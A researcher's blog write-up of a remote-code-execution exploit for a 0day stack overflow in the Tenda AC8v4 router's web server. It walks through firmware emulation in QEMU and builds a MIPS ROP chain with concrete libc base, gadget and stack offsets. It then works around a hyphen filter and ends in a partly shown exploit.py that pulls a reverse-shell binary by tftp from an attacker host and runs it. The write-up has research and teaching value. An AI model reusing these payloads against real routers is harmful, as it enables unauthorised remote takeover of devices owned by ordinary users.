ROPing Routers from scratch: Step-by-step Tenda Ac8v4 Mips 0day Flow-control ROP -> RCE


Patrick Peng

June 12, 2024


Recently, my passion for binary-exploitation had been triggered unconsciously after learning new fun stuff on CEs and DLLs; Not sure why but I am always obsessed with assemblies, caller stacks, and glibc heaps and kinds of stuff. Thus I decided to look back into a batch of 0day that I found before and try to turn them into RCEs with these fun gadgets (always like controlling the flow makes me feel satisfied)

/bin/httpd: Service or Sink

The exploitation started on the tenda.com latest firmware on its popular Ac8v4 Router; By accessing 's official firmware downloading page https://www.tenda.com.cn/download/detail-3518.html); After unzipping the firmware, you should see something similar to this; with one .docx introduction of installing the firmware and a mysterious .bin file:

 🐈 V16.03.34.06 tree
    ├── AC8V4 xxxx.docx
    └── US_AC8V4.0si_V16.03.34.06_cn_TDC01.bin

Here the US_AC8V4.0si_V16.03.34.09_cn_TDC01.bin file is the firmware system of the Ac8v4 ! By Binwalk -Me with squashfs installed, we can see the entire Router firmware system at squashfs-root:

 🐈 squashfs-root tree -L 1    
    ├── .....
    ├── etc -> /dev/null
    ├── init -> bin/busybox
    ├── lib
    ├── mnt
    ├── proc
    ├── root -> /dev/null
    ├── sbin
    └── .....

As we can see here, the inner Ac8v4 Firmware has the same architecture of a normal Linux-alike file system, with /root, /proc, /bin, /etc as root directories are shown here, but, also as we can see, some of these file-system paths are pointed into /dev/null; which will need a bit of technique when it comes to simulating the firmware:) By viewing these binaries, I found a suspicious binary httpd which is considerably large; as large as we can assume that it is the main service of the binary:

By using IDA as our debugger, as the binary get loaded in, we can see a huge list of integrated API, such as websPageOpen, sslFreeConnection... and other un-named APIs such as sub_4222DC and sub_495368; But how can we find possible vulnerabilities at the great amount, well the magic is source-to-sink and excluding sink by websGetVar -> the function that parses remote sent data into the hosting binary;

After a while of source-to-sinking and thinking, we locate a suspicious API : sub_4A79EC, which seems to used to dealt with connections at /goform/SetSysTimeCfg from call chain sub_4A79EC -> fromSetSysTime -> formDefineTendDa, which defined all webform components :

int __fastcall sub_4A79EC(int a1)
  s = (char *)websGetVar(a1, "time", &unk_4F09E0);
  sscanf(s, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", v6, v8, v10, v12, v14, v16);
  v18.tm_year = atoi((const char *)v6) - 0x76C;
  v18.tm_mon = atoi((const char *)v8) - 1;

as introduced the websGetVar parsed in the a2 -> "time" from the listen webform /goform/SetSysTimeCfg, the s is directly parsed into sscanf and stored into stack-based variables such as v6, v8, this is extremely dangerous since this is how sscanf works:

The sscanf() function reads data from buffer into the locations given by argument-list. If the strings pointed to by buffer and format-string overlap, behavior is undefined.

Each entry in the argument list must be a pointer to a variable of a type that matches the corresponding conversion specification in format-string. If the types do not match, the results are undefined.

The format-string controls the interpretation of the argument list. The format-string can contain multibyte characters beginning and ending in the initial shift state.

What sscanf() actually does is that it filters arg1 and splits and save them into different stack-based variables; in our case, the augment s is being parsed in as the time argument in (char *)websGetVar(a1, "time", &unk_4F09E0);, here the sscanf filters the input by the regex %[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s; which extracts data into v6 or v9 or v10 or ... as data1:data2:data2 pr data1-data2-data3; which as these variables located on the stack; being even more dangerously

Mipsel is the best!

results of readelf -h tells us this binary is built in Mips's endianness little architecture, to actually ROP on this architecture, we will need to know more how commands here works more than the header cheat sheet and figure out how to run them on virtual-machines; To begin with, the registers works as this:

"$a0" – "$a3": Parameters for function calls. If there are more than 4 parameters, the extra ones are passed via the stack."$t0" - "$t7": Temporary registers. "$s0" – "$s7": Saved registers. When using them, you need to save the registers you use to the stack. "$gp": Global pointer, used to access data within a 32K range."$sp": Stack pointer, points to the top of the stack. "$fp": Frame pointer. "$ra": Stores the return address.

As you noticed, Mips does not have $bp register, all stack-based operations will be implemented via the $sp register; additionally, leaf functions and non-leaf functions exist in Mips as a concept for RA's behavior in the stack, which the leaf function calls other external functions as API, non-leaf does not, but in our case, we don't need to take to much focus on that! Furthermore, mips also supports lots of immediate operations such as addiu, if you are not familiar with this, recommends checking the cheat sheet, which will help a lot in our ROP part!

QEMU + Patching: Brain simulation (things I spend 2 days in)

Before we starts, do not use WSL2 / WSL in this task because I promised you pre-setup in networks won't work (just like running steam on MacBook's arm), try to use Ubuntu-22.04 VMware can save you tons and tons of time.

hardware virtualization. It is a hosted virtual machine monitor: it emulates the machine's processor through dynamic binary translation and provides a set of different hardware and device models for the machine, enabling it to run a variety of operating systems. QEMU can run without a host kernel driver and yet gives acceptable performance, thanks to dynamic translation. It supports a variety of target architectures, including but not limited to x86, ARM, MIPS, PowerPC, and SPARC, which makes it a versatile tool for developing, testing, or simply running software for different architectures.

For us to run the MipselTenda Ac8v4 image in a identical environment as the router without buying one (I bought one but still shipping as I wrote this); we will need to utilized QEMU as our multi-arch supported VM for MIPsel. QEMU supports different level of simulation depends in your cases, qemu-xxx-static can allows you to run cross-arch binary independently, while qemu-system-xxx allows you to run the entire file system, in our case, qemu-system will work best for us since we have to deal with all these Dynamic-Linking Binaries and stuffs; Nevertheless it also takes more efforts to run.

To begin with, there are a bit of ifconfig configurations we need to handle first, inter-communications between qemu and your localhost are always something that causes lots of headaches, for us, we will try to build a tun and tap device; which qemu virtual machines read and write the /dev/net/tun device as a file descriptor, using the tap0 network interface card to interact with the host's protocol stack (which requires a bridge br0 in your host).

apt-get install bridge-utils
apt-get install uml-utilities

ifconfig ens33 down                   # ens33 : switch it to your local interface
brctl addbr br0                          # Adding br0
brctl addif br0 ens33                 # Linking to br0
brctl stp br0 on                    # On stp
brctl setfd br0 2                    # forward delay
brctl sethello br0 1                # Hello time
ifconfig br0 promisc up        # enable br0
ifconfig ens33 promisc up    # enable local interface
dhclient br0                        # obtain br0's IP via dhclient

brctl show br0                        # ls br0
brctl showstp br0                    # show info of br0

tunctl -t tap0                        # add tap0
brctl addif br0 tap0                # link to br0
ifconfig tap0 promisc up    # enable tap0
ifconfig tap0 192.168.x.x/24 up        # assign an ip for tap0 (x in subnet)

brctl showstp br0                    # show br0's interface

As now if you check for the info of br0, tap0 will be disable currently; which will turns into forwarding after we started our qemu-system; furthermore, br0, tap0 and your local interface should be in one same subnet. Moving on to the qemu-system-mipsel building; we will need to install the debianmipsel image at people.debian.org:

wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2
wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-2.6.32-5-4kc-malta
wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta

After that, we can start out qemu-system-mipsel simulation as this!

sudo qemu-system-mipsel \
    -M malta \
    -kernel vmlinux-3.2.0-4-4kc-malta \
    -append "nokaslr root=/dev/sda1" \
    -hda debian_wheezy_mipsel_standard.qcow2 \
    -net nic -net tap,ifname=tap0,script=no,downscript=no \

The -net nic option indicates that QEMU should create a virtual network card in the virtual machine. The -net tap option specifies that the connection type is TAP, and -ifname specifies the network interface name (which is the tap0 created earlier, essentially connecting the QEMU virtual machine to the bridge). The script and downscript options are used to tell QEMU whether to call scripts to configure the network environment when the system starts automatically. If these two options are empty, QEMU will automatically select the first nonexistent TAP interface (usually tap0) as the parameter and call the scripts /etc/qemu-ifup and /etc/qemu-ifdown when starting and stopping. Since we have already configured everything, we can set these two parameters to no.

After the initialization (defaulted username and password are root) , eth0 is not defaulted auto-assigned an ip address, we can manually assign one as ifconfig eth0 192.168.x.x/24 up (notice change x into free address in subnet). Now we upload the squashfsbinwalk-ed firmware by scp command, as we unzip the filesystem at /root, make sure to mount /dev and /proc to the filesystem via mount -o bind /dev /root/dev && mount -t proc /proc /root/proc. then chroot /root sh to get into the file system root of the Tenda Ac8v4;

Now if you run the vulnerable ./bin/httpd, you may find two issues; the first one tells you some libc file and symbol doesn't exist, which can be fixed easily by adding it to the env via export LD_LIBRARY_PATH=/lib:$LD_LIBRARY_PATH. Nevertheless. the second one requires more tricks, after rightfully setting the LD_LIBRARY_PATH and the program started to run. you might found something very weird; which the program will be stuck after Welcome to ..., without any networking binding heads-ups.

Well, if you search for string 'welcome' in IDA, you cross-reference the string which will takes you to main()! and the cause of this is located at ifaddrs_get_ifip() (You should see something similar to this):

  puts("\n\nYes:\n\n      ****** WeLoveLinux****** \n\n ****** Welcome to ******");
  while ( 1 )
    lan_ifname = ifaddrs_get_lan_ifname();
    if ( ifaddrs_get_ifip(lan_ifname, v10) >= 0 )

the reason why it got stuck is due to the fact that ./bin/httpd will run a bunch of networking scripts to make sure the router is in a good state, nevertheless, these networking scripts are never that necessary, we can simply bypass this assert by patching the return value for ifaddrs_get_ifip in the assemble; or easily, jump to loc_43B798 directly:

.text:0043B768                 lw      $gp, 0x6B8+var_6A8($fp)
.text:0043B76C                 bgez    $v0, loc_43B798  # <- j loc_43B798
.text:0043B770                 nop

If you don't want to enjoy opening IDA Pro, no worries! You can download the patched version here -> github.com ; Now replacing the original ./bin/httpd, the script should continue, but other issues will start to manifest; when assigning the listening address for httpd, httpd might say 'unable to assign address' or listened on! How did this happen? If you search for 'httpd listen ip' as a string; it will take you to socketOpenConnection() and back to main()

  v4 = ifaddrs_get_lan_ifname();
  if ( ifaddrs_get_ifip(v4, v11) < 0 )
    GetValue("lan.ip", v8);
    strcpy(g_lan_ip, v8);
    memset(v12, 0, 0x5E4u);
    if ( !file_lan_dhcpc_get_ipinfo_and_status(v12) && v12[0x8C] )
      strcpy(g_lan_ip, &v12[0x8C]);

which the lan.ip comes from global variable g_lan_ip, which generally obtain the ip at interface br0; in our case, we don't have br0 bridge interface in the QEMU (we have it in Ubuntu VMware indeed), thus we will have to create one using similar to the pre-qemu setup, using brctl and ifconfig; we can try to assign the address manually ourselves instead of using dhclient:

brctl addbr br0                        # adding br0 interface
ifconfig br0 192.168.x.x/24 up        # manuly assigning an ip adress

Boom! now re-run the ./bin/httpd file after exporting the LD_LIBRARY_PATH, patching the ifaddrs_get_ifip(), and building us a br0 interface; Now finally, the binding to the rightfully ip and port as httpd - web.c:158 debugging message shows, and we can directly access this in our browser, and we can see Tenda Ac8v4's index page!

$a0+$t9: Overflow and Flow-control


After setting up the qemu-system level simulation for Tenda Ac8v4, it is time to put it into practice! But before we start, serving a gdbserver for the ./bin/httpd can help us a lot! Firstly, make sure you fetch the latest possible gdbserver binary at https://github.com/lucyoa/embedded-tools/tree/master/gdbserver, also be sure you download the right corresponding architecture as the QEMU VM, in our case, we will choose gdbserver-7.7.1-mipsel-mips32-v1 to host; after downloading it via wget or scp and chmod +x it, use ./gdbserver[PORT_YOU_WANT] ./bin/httpd to start serving! Also since we are debugging in mipsel, we will need gdb-multiarch to debug it (install as apt install gdb-multiarch); After this, you can connect to this server by gdb-multiarch -q ./bin/httpd, then target remote [address]:[port]; make sure you continue when you are connected.

If you uncounted mistakes connecting to the gdbserver; try remounting the /proc as mount -t proc /proc /root/proc before you chroot . sh to the firmware:)

After the gdbserver is set, we can exploit this stack-based overflow at /goform/SetSysTimeCfg as Proof-of-Concept! I created this poc.py script to firstly test-out the overflow:

def sink(

    import requests
    url = "http://{host}:{port}/goform/SetSysTimeCfg"
    _payload = b''
    _payload = b'retr0reg' + b":" + payload
    data = {

    def send_request():
            requests.post(url=url, data=data)
        except Exception as e:
            print(f"Request failed: {e}")


For our initial payload, we can use pwndbg integrated cyclic to generate one; after sending a considerably large payload, we can see the program received Segmentation fault due to Invaild return address, this firstly allowed us to cause DoS on component ./bin/httpd and halt the router!

At this point, using pwndbg integrated cyclic -l allows us to calculate the hijacked flow-controlling offset relative as our sent data using these special patterns; we can know the cause of the migration of the control flow is at offset 123, b'bgaa' (hex: 0x62676161); meaning that replacing that offset with pointers allows us to manipulate the control-flow into that address, with that as our basis, we can start our advanced roping and achieving our final goal: Remote-Code Execution.

MIP ROP: Pointer World

For mips architecture, ROP will be a different subject comparing to the norm ROP that we're most familiar within Intel syntax; MIPS architecture uses a different mechanism to implement function returns. Specifically, MIPS uses registers and jump instructions to achieve function returns. mostly by jal and ja $ra due to the focus of usage on $sp; Thus in mips's ROP we cannot always use gadgets as pop rdi, ret to control the flow of execution but rather focus on with registers and pointers; This makes ROP even harder since lots of pre-setting on stack is required and changes occurs frequently between gadgets with the raise or low of the $sp, additionally making it more confusing for us to pre-plan stack gadgets and targets.

To begin with, as the wonderful mipsrop plugin of IDA Pro is provided to us, we can scan for utilizable Gadgets for ROP flow controlling. For a larger room exploitation, we decided to focus on the lib/libc.so dynamic linking library as our gadget library, while the router file system not protected by ASLR (if is we can leak via ROP), we can call them at a fixed offset to the fix libc_base; which in our case, via vmmap the libc_base for libc.so -> (77f59000-77fe5000 r-xp 00000000 08:01 788000) is located at 77f59000. After knowing that, we can try to find gadgets for the flow control

Trial 1: $a0 manipulation

Mipsrop provided us with the misrop.system() method for locating $a0 modification with corresponding flow control gadget that is arranged very closely to each other. in our case, we found these two in libc.so:

|  Address     |  Action                                              |  Control Jump                          |
|  0x0004D144  |  addiu $a0,$sp,0x24+var_C                            |  jr    0x24+var_s0($sp)                |
|  0x00058920  |  addiu $a0,$sp,0x28+var_C                            |  jr    0x28+var_4($sp)                 |

As these two gadget showed at 0x0004D144 and 0x00058920, both of them allow us to control register $a0 (the first argument register) with an offset on the stack by register $sp (addiu x,y,z = x = y+z), while direct jr (jmp) to another stack-offset by $sp; this allows us to control have control over the $a0 for parameter passing before controlling the flow to another calle function by stack data we can control! For example, as the gadget 0x0004D144 at libc.so, we can firstly change the $pc padding to libc_base + 0x0004D144 , pad the expected value for $a0 at offset 0x24+var_C of $sp (this value equals to 0x24 - 0xC = +0x24), then pad $sp offset 0x24+var_s0 (0x24+0) to the jr jumping address; creating stack structure like this:

|     ret_addr     +  gadget 0x4D144 |
|     $sp+0x18     +    $a0_addr     |
|     $sp+0x24     +    jr_addr         |

Now as we know the $pc register offset at offset 123 (b'bgaa' (hex: 0x62676161)) by cyclic, also known that $sp is at offset 127 (b'bhaa' (hex: 0x61616862)); furthermore, we will need to find the target for the ROP, in this case, since we already knew the libc_base address for libc.so, we manipulate jr_addr -> libc_base + _system (libc.so symbol of system), while manipulating $sp+0x30 as the $a0 passed into _system, the command string; which will give us this first exploit:

    def _rop(ropcmd: RopCmd):

        # 77f59000-77fe5000 r-xp 00000000 08:01 788000 
        libc_base = 0x77f59000

        ret_offset = 0x7b # --> b'bgaa'
        sp_offset  = 0x7f # --> b'bhaa'

        _system = 0x004E630

        a0_EQ_sp24_c_JR_24sp  = 0x0004D144 # addiu $a0,$sp,0x24+var_C | jr 0x24($sp)
        # LOAD:0004D144                 addiu   $a0, $sp, 0x24+var_C
        # LOAD:0004D148                 lw      $ra, 0x24+var_s0($sp)
        # LOAD:0004D14C                 nop
        # LOAD:0004D150                 jr      $ra

        a0_EQ_sp28_c_JR_24sp  = 0x00058920 # addiu $a0,$sp,0x28+var_C | jr 0x24($sp)
        # LOAD:00058920                 addiu   $a0, $sp, 0x28+var_C
        # LOAD:00058924                 lw      $v1, 0x28+var_C($sp)
        # LOAD:00058928                 lw      $ra, 0x28+var_4($sp)
        # LOAD:0005892C                 sw      $v1, 0($s0)
        # LOAD:00058930                 lw      $s0, 0x28+var_8($sp)
        # LOAD:00058934                 jr      $ra

        _payload = {
                ret_offset: libc_base + a0_EQ_sp24_c_JR_24sp,
                (sp_offset + 0x18): b'`mkdir /retr0reg`',
                (sp_offset + 0x24): libc_base + _system,

        return flat(_payload)

Here we constructed our ROP payload using pwntools's flat method, which avoids tons of 'payload +=', p32() operations and constructs payload easily with offsets as dictionary; with the libc_base we obtained previously via vmmap (/proc/<pid>/maps) and $pc + $sp offset via cyclic pattern string; This ROP-Chain should work as the $pc changed into libc_base + a0_EQ_sp24_c_JR_24sp; the $a0 will be mov into sp_offset + 0x18 where stored our RCE Command, then jr into libc_base + _system's libc system() API. Now we can send the flattened _payload directly via our constructed sink(); and lets see what will happen...

Well, ./bin/httpd received SIGSEGV at 0x77fa7640, which is near just a few commands away from libc_base + _system: 0x77fa7630, in one hand a good sign that we controlled the flow to the target libc_base + _system symbol loaded in the libc.so and the $a0 register is indeed modified into stack address pointing 0x646b6d60. Nevertheless, the loaded libc symbol system seemed not to function as stop in 0x77fa7640 as lw $t9, -0x7f90($gp) caused SIGSEGV; But why?

The answer to this question is hidden in the current command: lw $t9, -0x7f90($gp), where the compiler tried to load word (lw) from negative -0x7f90 offset of the global register $gp. This is a normal action for libc to load other symbols called in the current symbol for example here if you check the decompiled version of libc.so in IDA Pro, you will find that this command is loading memset from the global symbols. However, due to the previous direct overflow component, the $gp register seemed un-properly set here, causing the CPU to access an illegal address 0x7800f34c - which does not even exist on vmmap segmentation! triggering the SIGSEGV Segmentation error of the CPU.

Trial 2: $a0 + $t9?

To solve this issue that's blocking us, we will have to find a way for $gp-0x7f90 to be a legit address - in the best case accurate address pointing symbol memset from the loaded libc; and here goes something fun, if you look above till when the system() symbol is initialized or loaded around 0x004E630, you will find this segment where it tells you how did $gp come from.

LOAD:0004E630                 li      $gp, (unk_9C2D0+0x7FF0 - .)
LOAD:0004E638                 addu    $gp, $t9
LOAD:0004E63C                 addiu   $sp, -0x450
LOAD:0004E640                 la      $t9, memset

unfortunately, the li instruction blocks for possible direct $gp modification via ROP before calling system(), since here the $gp will be loaded as immediate value (unk_9C2D0+0x7FF0 - .); Nevertheless, leaning forward, you will find addu $gp, $t9, which tells us the actual cause is the register $t9. Well, this is both great news and bad news. On one hand, it will be impossible to find a gadget that manipulates $gp by a stack-based value and jmp to another one due to the fact that $gp is hardly changed via stack value at all, find $t9 will be much easier. On the other hand, we might need to construct a brand-new ROP-chain for the exploitation.

But before designing a chain modifying the $t9 register, it will be the best to check what value will be appropriate for $t9:

By setting breakpoint at 0x77f59000+0x004E630(system()); we can find that despite different commands is called as $a0, the $t9 register will be always set to this magic address - 0x77fa7630, which appears to be the exact starting command of the system() symbol; also made $t9, -0x7f90($gp) an legit address in the libc.soallocated memory -> 0x77ff4000 0x77ff6000 rw-p 2000 8b000 /lib/libc.so; Now it's the time for us to construct the ROP-Chain with $t9 manipulation, while allowing $a0 to arbitrary and jmp to loaded system() in libc.

The million dollars question is: how can we control $t9 while allowing us to finally jmp to our previous $a0 get-shell gadget; well, this required another mipsrop-ing. By searching for move $t9; we can find great loads gadgets that fix our expectation for $t9 modification whether by direct valuing or indirect ones via registers:

Python>mipsrop.find('move $t9')
|  Address     |  Action                                              |  Control Jump                          |
# tons of indentical gadgets at different address in libc.so.....
|  0x0006D970  |  move $t9,$s4                                        |  jr    $s4                             |
|  0x0006EFA0  |  move $t9,$s3                                        |  jalr  $s3                             |
|  0x0006EFD0  |  move $t9,$s3                                        |  jalr  $s3                             |
|  0x00070E14  |  move $t9,$s2                                        |  jalr  $s2                             |
|  0x00072E00  |  move $t9,$s3                                        |  jalr  $s3                             |
|  0x00075474  |  move $t9,$v0                                        |  jr    $v0                             |
|  0x00078190  |  move $t9,$s1                                        |  jalr  $s1                             |
|  0x000783D0  |  move $t9,$s1                                        |  jalr  $s1                             |
|  0x000784DC  |  move $t9,$s1                                        |  jalr  $s1                             |
|  0x0007A19C  |  move $t9,$t1                                        |  jalr  $t1                             |
|  0x0007A1B4  |  move $t9,$t0                                        |  jalr  $t0                             |
|  0x0007EA1C  |  move $t9,$t0                                        |  jalr  $t0                             |
|  0x0007EBD8  |  move $t9,$s2                                        |  jalr  $s2                             |
|  0x0001B014  |  move $t9,$s4                                        |  jr    0x1C+var_s18($sp)               |

However,to meet the requirement which would allows us to jmp to other gadget on the stack as the $a0 changer and stack-caller; only the 0x0001B014 gadget will function as we expected! Which firstly move register $s4's value to $t9, then jmp into stack address 0x1C+var_s18($sp) ($sp + 0x1C + 0x18) which will be storing the previous a0_EQ_sp24_c_JR_24sp.

Nevertheless, it will also be necessary to look for the manipulation on $s4 register before the gadget 0x0001B014 gets triggered; this one will be a relatively easier job since $s4 is pretty common medium register in stack-controlling; which we will continuously use mipsrop.find() for gadgets that fits mipsrop.find('.* $s4'); as the $s4 being the operated register:

Python>mipsrop.find('.* $s4')
|  Address     |  Action                                              |  Control Jump                          |
# 70 lines that fits our requirement....
|  0x0007E8C8  |  lw $s4,0x38+var_s10($sp)                            |  jr    0x5C($sp)                       |
|  0x0007EB5C  |  lw $s4,0x44+var_s10($sp)                            |  jr    0x5C($sp)                       |

This time mipsrop.find returns with us other loads of gadgets! which fortunately all contains stack-caller gadgets such as jr 0x5C($sp) additionally allows us to control $s4 via stack-based variable via $sp such as 0x38+var_s10($sp) ; This time, we will just simply choose the one looks nice while giving greater space on the stack with less collisional address of these two stack-pointing operated; which comparing to 0x0007EB5C, 0x0007E8C8 leaved us with extra *((0x44+0x10)-(0x38-0x10)=0x2c)*space for the $s4 (which doesn't really matters that much for $s4).

Now as that we can control $t9 via $s4, which came from 0x44+var_s10($sp) which will be set as the gadget0 via ret_addr; we can now specific the jr address of move $t9,$s4, jr 0x1C+var_s18($sp) to point at gadget addiu $a0,$sp,0x24+var_C, which will obtain $a0 from sp+0x24+0xC, then jr to address that 0x24+var_s0($sp) be pointing at.

As now, we can construct payload as:

+------offset------+------value---------------------------------------+ <|-- g0
|     ret_addr     |  lw $s4,0x38+var_s10($sp) + jr 0x5C($sp))        | ---
|------------------+--------------------------------------------------|   |
|     $sp+0x24     |  libc_base + system()                              |   |
|------------------+--------------------------------------------------|   | g1
|     $sp+0x30     |  command_for_$a0                                  |   |
|     $sp+0x34     |  addiu $a0,$sp,0x24+var_C + jr 0x24+var_s0($sp)  |   |  |
|------------------+--------------------------------------------------|   |  |
|     $sp+0x48       |  #s4_content                                      |   |  | g2
+------------------+--------------------------------------------------|<|-|  |
|     $sp+0x5C     |  move $t9,$s4 + jr 0x1C+var_s18($sp)                |------- 

Trial 3: The Evil $sp

Now, if we simply align all these gadgets and operated data on the stack using the sp_offset that we obtained previously via cyclic, you will find something very interesting: It doesn't works at all! But why? lets dig back into these gadgets we collected previously. Taking the previous and now the first gadget that our return_addr will be directly pointing, other than the lw $s4,0x44+var_s10($sp); jr 0x5C($sp) part we all see, there's actually a part hidden.

IDA allows us to examinate the instruction at a specified address by simply double-clicking on the address itself, in our case, double-clicking on the 0x0007E8C8, it will take us to here:

LOAD:0007EB5C loc_7EB5C:
LOAD:0007EB5C                 lw      $ra, 0x44+var_s18($sp)
LOAD:0007EB60                 lw      $s5, 0x44+var_s14($sp)
LOAD:0007EB64                 lw      $s4, 0x44+var_s10($sp)
LOAD:0007EB68                 lw      $s3, 0x44+var_sC($sp)
LOAD:0007EB6C                 lw      $s2, 0x44+var_s8($sp)
LOAD:0007EB70                 lw      $s1, 0x44+var_s4($sp)
LOAD:0007EB74                 lw      $s0, 0x44+var_s0($sp)
LOAD:0007EB78                 jr      $ra
LOAD:0007EB7C                 addiu   $sp, 0x60

as 0x0007E8C8 and 0007EB5C defined, the Action and Control Jump gadget is exactly as what we expected; between the Action and the Control Jump gadgets, the gadget we manipulated to jmp to also contains other instruction for example here, the s1-s5 register is furthermore effected to the stack-content that we overflown; However, what's most important is, the $sp modification still applies to us even after the jr $ra (0x44+var_s18($sp)) instruction; What this meant for us is that the $sp pointer in our payload will needs to be re-constructed considering the rise of lower of the $sp cause by previous gadget; For instance, as our next gadget goes to 0x0001B014 the move $t9,$s4; jr 0x5C($sp) and the $sp had been raised by 0x60 ; the actual 0x5C($sp) will be sp_offset + 0x60 + 0x1C + 0x18 = sp_offset + 0x60 + 0x34; this goes same for our gadget1, which also changed $sp pointer by the value of +0x38:

LOAD:0001B014                 move    $t9, $s4
LOAD:0001B018                 lw      $ra, 0x1C+var_s18($sp)
LOAD:0001B01C                 lw      $s5, 0x1C+var_s14($sp)
LOAD:0001B020                 lw      $s4, 0x1C+var_s10($sp)
LOAD:0001B024                 lw      $s3, 0x1C+var_sC($sp)
LOAD:0001B028                 lw      $s2, 0x1C+var_s8($sp)
LOAD:0001B02C                 lw      $s1, 0x1C+var_s4($sp)
LOAD:0001B030                 lw      $s0, 0x1C+var_s0($sp)
LOAD:0001B034                 jr      $ra
LOAD:0001B038                 addiu   $sp, 0x38

At this point, with modified $sp, we can reconstruct our payload with new $sp offset which is decided by the call sequence of these gadgets, which leads us to this with rop chain: lw $s4 0x48; jr 0x5c -> move $t9,$s4 jr 0x34($sp) -> addiu $a0,$sp,0x28+var_C | jr 0x24($sp); with defined $sp of

  • sp_offset -> 0x7f: defined at sink.

  • sp2 -> 0x60 : addiu $sp, 0x60.

  • sp3 -> 0x38 : addiu $sp, 0x38.

        _payload = {
                ret_offset: libc_base + lw_s4_0x48_JR_5Csp, # gad0
                (sp_offset + 0x48): t9_target,
                (sp_offset + 0x38 + 0x18): f'{c2}'.encode(), # $s6, 0x38+var_s18($sp)
                (sp_offset + 0x5c): libc_base + t9_EQ_s4_JR_1C_p_18, # gad1
                (sp_offset + 0x60 + 0x1C + 0x10): f'{c1}'.encode(), 
                 # flow2 $s4-$s5 (caller), this is set via previous control-ed registers
                (sp_offset + 0x60 + 0x34): libc_base + a0_EQ_sp24_c_JR_24sp, 
                (sp_offset + 0x60 + 0x38 + 0x24): libc_base + _system, # gad2
                (sp_offset + 0x60 + 0x38 + 0x24 + 0xC - 0x7): f'$({c3});'.encode()

For some mysterious reason, system() seem also taking argument at $s4-s6, which $s4-$s5 is set as collateral for t9_EQ_s4_JR_1C_p_18 (move $t9, $s4), $s6 is set as collateral for gadget1 as specified stack-based offset of 0x38+var_s18($sp); which enable us to execute a 8-bytes command via system(). Nevertheless, as $a0 set at gadget3 as a0_EQ_sp24_c_JR_24sp with offset sp_offset + 0x60 + 0x38 + 0x24 + 0xC - 0x7, we can execute arbitrary length command!


Aftermath: Wget-less and Hyphen-less

At this point, executing arbitrary commands on the Tenda Ac8v4 Router will a easy-peasy task for us. Nevertheless, if you ever logged into the QEMU VM that was created for this router's file system, you will there's pretty nothing we can run, even scp and wget don't exist in busybox, then how can we create a reverse-shell back to our machine? Well, the answer still hides in the busybox:

Currently defined functions:
    [[, adduser, arp, ash, awk, brctl, cat, chmod, cp, date, depmod,
    dev, echo, egrep, env, expr, false, fgrep, free, grep, halt,
    ifconfig, init, insmod, kill, killall, linuxrc, ln, login, ls, lsmod,
    mdev, mkdir, mknod, modprobmount, mv, netstat, passwd, ping, ping6,
    poweroff, ps, pwd, reboorm, rmdir, rmmod, route, sed, sh, sleep,
    sulogin, sync, tar, telnetd, test, tftp, top, touch, traceroute,
    traceroute6, true, umount, uptime, usleep, vconfig, vi, yes

among all these fun functions, only one caught my eye: tftp; (such ironic since the only way for the router itself to communicate with the internet is via tftp or telnetd and ping) with tftp, it came to our mind to build an reverse-shell connecting malware and host on our tftp; then fetch it via the router's tftp binary; which furthermore we can chomd +x and ./RUNIT, creating an reverse-shell! How fun is that! By hosting the tftp server remotely, use: sudo apt-get install xinetd tftpd tftp and specific you server_arg in /etc/xinetd.d/tftp, you can follow this tutorial.

This approach seemed really promising, but after try fetch our written malware, you will find something pretty strange; when we passed the command $(tftp -g -r rs && chmod +x rs && ./rs 9000) into the c3, the backend of the ./bin/httpd will kept erroring unfinished (); why will that be? well, taking a peak back at our sink, you might understand how (I was confused with this about 2 hours as I thought it was problems with my payload but is not):

int __fastcall sub_4A79EC(int a1)
  s = (char *)websGetVar(a1, "time", &unk_4F09E0);
  sscanf(s, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", v6, v8, v10, v12, v14, v16);
  v18.tm_year = atoi((const char *)v6) - 0x76C;
  v18.tm_mon = atoi((const char *)v8) - 1;

As if you remember, the logic that sub_4A79EC will results stack-based overflow is due to the fact that it scans s -> (char *)websGetVar(a1, "time", &unk_4F09E0); into v6, v8, v10, v12, v14, v16 with no limitation on the boundary. Allowing us to construct a payload: time=retr0:xxxxx<overflowing_character>xxxxx to cause overflow. Recall how we described this sccanf works in regex,

here the sscanf filters the input by the regex %[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s; which extracts data into v6 or v9 or v10 or ... as data1:data2:data2 pr data1-data2-data3; which as these variables located on the stack; being even more dangerously

sscanf extracts our data using : or - as delimiter; including the tftp -g -r rs's hyphen -g as well! this will result the sscanf to truncate the original outputting into v6, v8, v10, thus only the prefix until the - will be kept and executed! leading to the un-finishing of (). Failing command execution. Then how can we solve the Hyphen Issue?

Here I used a pretty fun solution: as bash allows save output of an command and slice similar as how python's [::] works, we can try to obtain - from command output and save the sliced - as a environmental variable and replace the - with the saved character environmental variable whenever our payload contains it! As instance, if you run command tftp in the busybox, this is what it will outputs:

BusyBox v1.19.2 (2022-12-20 11:55:28 CST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

    -l FILE    Local FILE
    -r FILE    Remote FILE
    -g    Get file
    -p    Put file
    -b SIZE    Transfer blocks of SIZE

Now, if we save the output via output=$(tftp 2>&1), then count the location of -l 's -(which is47), then save the character into another variable for instance spec; Now whenever we need to use the character -, we can simply add prefix output=$(tftp 2>&1);spec=${output:47:1}; before the command and replace all - which will not trigger the truncation of sscanf, allowing us to specific arguments which enable us to fetch and execute the file download via $(tftp -g -r rs && chmod +x rs && ./rs 9000)!!!


And now we own the router:)


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

#File: exploit.py
#Author: Patrick Peng (retr0reg)

import requests
import argparse
import threading
from pwn import log, context, flat, listen
from typing import NamedTuple

session = requests.Session()
session.trust_env = False

def ap():    
    parser = argparse.ArgumentParser()
                    help="exploiting ip")
                    help="exploiting port")
        help="attacker host"
    args = parser.parse_args()
    return ['',f'tftp -g -r rs {args.attacker_host} && chmod +x rs && ./rs {args.attacker_host} 9000'], args.host, args.port

class RopCmd(NamedTuple):
    second: str

def pwn(
        ropcmd: RopCmd,
        host: str = '',
        port: int = 80,

    listener = listen(9000)
    context(arch = 'mips',endian = 'little',os = 'linux')

    def sink(
